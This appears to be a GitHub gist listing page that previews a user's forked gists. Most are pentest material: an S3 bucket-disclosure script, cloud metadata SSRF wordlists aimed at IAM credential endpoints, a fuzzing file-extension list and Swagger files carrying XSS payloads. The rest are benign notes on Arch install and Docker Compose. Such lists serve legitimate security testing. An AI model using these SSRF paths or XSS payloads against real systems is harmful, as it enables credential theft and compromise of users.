mswell
/ bucket-disclose.sh
Created
April 25, 2024 15:45
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
mswell
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Created
March 23, 2024 01:01
— forked from 0xdevalias/_deobfuscating-unminifying-obfuscated-web-app-code.md
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
mswell
/ cloud_metadata.txt
Created
March 9, 2024 01:09
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
mswell
/ t490-arch-install-steps.sh
Last active
March 1, 2024 20:04
— forked from davidpeach/t490-arch-install-steps.sh
T490 arch install steps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These are the steps I take to install a fresh copy of Arch Linux on to a Lenovo Thinkpad T490 | |
| # Spec: i7; 40gb RAM; | |
| # This will go from the very start up to having a base installation ready to add you chosen window manager or desktop environment. | |
| # Make a bootable usb stick with the latest version of Arch Linux on. | |
| # Plug to into computer and boot. | |
| # Connecting to Internet (wifi) | |
| iwctl device list |
mswell
/ cloud_metadata.txt
Created
November 29, 2023 22:26
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
mswell
/ gist:348493f33c061b15203f379de8453251
Created
February 22, 2023 14:00
— forked from agungf/gist:8803512
Remove passphrase (password) from private RSA key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Should also work for: | |
| [v] any OpenSSH installation | |
| Given, your key is in id_rsa | |
| 1 | |
| Passphrase is needed? | |
| Try some host which has your public key (id_rsa.pub) |
mswell
/ Filename extension list
Created
February 13, 2023 01:27
— forked from securifera/Filename extension list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .php | |
| .html | |
| .txt | |
| .htm | |
| .aspx | |
| .asp | |
| .js | |
| .css | |
| .pgsql.txt | |
| .mysql.txt |
mswell
/ docker_compose_cheatsheet.md
Created
November 17, 2022 19:12
— forked from jonlabelle/docker_compose_cheatsheet.md
Docker Compose Cheatsheet
| title | subtitle | author | date | source |
|---|---|---|---|---|
Docker Compose Cheatsheet |
Quick reference for Docker Compose commands and config files |
Jon LaBelle |
April 7, 2019 |
mswell
/ swaggerxss.json
Created
September 9, 2022 18:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
mswell
/ swaggerXSS.json
Last active
April 8, 2024 22:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Example yaml.spec | |
| description: | | |
| <?math ><![CDATA[ ><img src onerror=alert(1)> ]]> ?> | |
| paths: | |
| /accounts: | |
| get: | |
| responses: | |
| '200': |
NewerOlder